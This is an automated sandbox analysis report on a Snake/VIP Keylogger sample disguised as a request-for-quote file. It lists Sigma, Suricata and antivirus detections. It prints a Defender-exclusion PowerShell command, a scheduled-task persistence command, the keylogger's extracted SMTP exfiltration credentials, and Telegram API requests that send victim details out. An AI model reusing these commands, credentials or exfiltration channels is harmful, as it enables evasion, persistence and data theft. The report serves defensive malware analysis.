Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ParentImage: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ParentProcessId: 7440, ParentProcessName: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ProcessId: 7612, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe", ParentImage: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ParentProcessId: 7440, ParentProcessName: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp", ProcessId: 7744, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T09:08:00.722061+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.7	49752	192.254.185.123	587	TCP
2025-02-19T09:10:24.508328+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.7	49751	192.254.185.123	587	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T09:08:29.831150+0100	2803305	3	Unknown Traffic	192.168.2.7	49715	104.21.32.1	443	TCP
2025-02-19T09:08:32.699650+0100	2803305	3	Unknown Traffic	192.168.2.7	49724	104.21.32.1	443	TCP
2025-02-19T09:08:33.493722+0100	2803305	3	Unknown Traffic	192.168.2.7	49726	104.21.32.1	443	TCP
2025-02-19T09:08:34.056065+0100	2803305	3	Unknown Traffic	192.168.2.7	49728	104.21.32.1	443	TCP
2025-02-19T09:08:35.685859+0100	2803305	3	Unknown Traffic	192.168.2.7	49734	104.21.32.1	443	TCP
2025-02-19T09:08:37.882479+0100	2803305	3	Unknown Traffic	192.168.2.7	49742	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T09:08:27.653275+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49712	193.122.130.0	80	TCP
2025-02-19T09:08:29.028281+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49712	193.122.130.0	80	TCP
2025-02-19T09:08:30.411477+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49716	193.122.130.0	80	TCP
2025-02-19T09:08:31.137660+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49719	193.122.130.0	80	TCP
2025-02-19T09:08:31.714312+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49721	193.122.130.0	80	TCP
2025-02-19T09:08:31.934559+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49719	193.122.130.0	80	TCP
2025-02-19T09:08:33.588119+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49727	193.122.130.0	80	TCP
2025-02-19T09:08:34.575217+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49731	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T09:08:38.779277+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49745	149.154.167.220	443	TCP
2025-02-19T09:08:41.501044+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49750	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\nDEusQ.exe

Avira: detection malicious, Label: HEUR/AGEN.1304597

Found malware configuration

Source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "587", "Password": "sales02@tmcksa.com", "Host": "smartyok4#", "Port": "587"}
Source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sales02@tmcksa.com", "Password": "smartyok4#", "Host": "mail.tmcksa.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\nDEusQ.exe

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Virustotal: Detection: 33%			Perma Link
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	ReversingLabs: Detection: 27%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Sample uses string decryption to hide its real strings

Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	String decryptor: sales02@tmcksa.com
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	String decryptor: smartyok4#
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	String decryptor: mail.tmcksa.com
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	String decryptor: 587
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49714 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49722 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49750 version: TLS 1.2

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 00C1F45Dh	9_2_00C1F2C0
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 00C1F45Dh	9_2_00C1F4AC
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 00C1FC19h	9_2_00C1F961
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065C3308h	9_2_065C2EF0
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CEA79h	9_2_065CE7D0
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065C2D41h	9_2_065C2A90
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CD919h	9_2_065CD670
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_065C0673
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065C3308h	9_2_065C2EE6
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CE1C9h	9_2_065CDF20
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CEED1h	9_2_065CEC28
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CF781h	9_2_065CF4D8
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CD069h	9_2_065CCDC0
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CD4C1h	9_2_065CD218
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065C3308h	9_2_065C3236
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CDD71h	9_2_065CDAC8
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CE621h	9_2_065CE378
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065C0D0Dh	9_2_065C0B30
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065C16F8h	9_2_065C0B30
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_065C0853
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_065C0040
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CF329h	9_2_065CF080
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 4x nop then jmp 065CFBD9h	9_2_065CF930
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 0569C813h	10_2_0569C960
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 0544F45Dh	14_2_0544F4AC
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 0544F45Dh	14_2_0544F2C0
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 0544FC19h	14_2_0544F961
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DC3308h	14_2_06DC2EF0
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DC2D41h	14_2_06DC2A90
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCF781h	14_2_06DCF4D8
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCDD71h	14_2_06DCDAC8
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DC3308h	14_2_06DC2EEB
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCD919h	14_2_06DCD670
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCD4C1h	14_2_06DCD218
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DC3308h	14_2_06DC3236
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCEA79h	14_2_06DCE7D0
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCE621h	14_2_06DCE378
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DC0D0Dh	14_2_06DC0B30
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DC16F8h	14_2_06DC0B30
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCE1C9h	14_2_06DCDF20
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCF329h	14_2_06DCF080
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	14_2_06DC0040
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCEED1h	14_2_06DCEC28
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCD069h	14_2_06DCCDC0
Source: C:\Users\user\AppData\Roaming\nDEusQ.exe	Code function: 4x nop then jmp 06DCFBD9h	14_2_06DCF930

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.7:49751 -> 192.254.185.123:587
Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.7:49752 -> 192.254.185.123:587
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49745 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49750 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:067773%0D%0ADate%20and%20Time:%2019/02/2025%20/%2013:04:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20067773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:067773%0D%0ADate%20and%20Time:%2019/02/2025%20/%2013:24:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20067773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49727 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49716 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49721 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49731 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49719 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49712 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49726 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49742 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49724 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49728 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49734 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49714 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49722 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:067773%0D%0ADate%20and%20Time:%2019/02/2025%20/%2013:04:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20067773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:067773%0D%0ADate%20and%20Time:%2019/02/2025%20/%2013:24:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20067773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
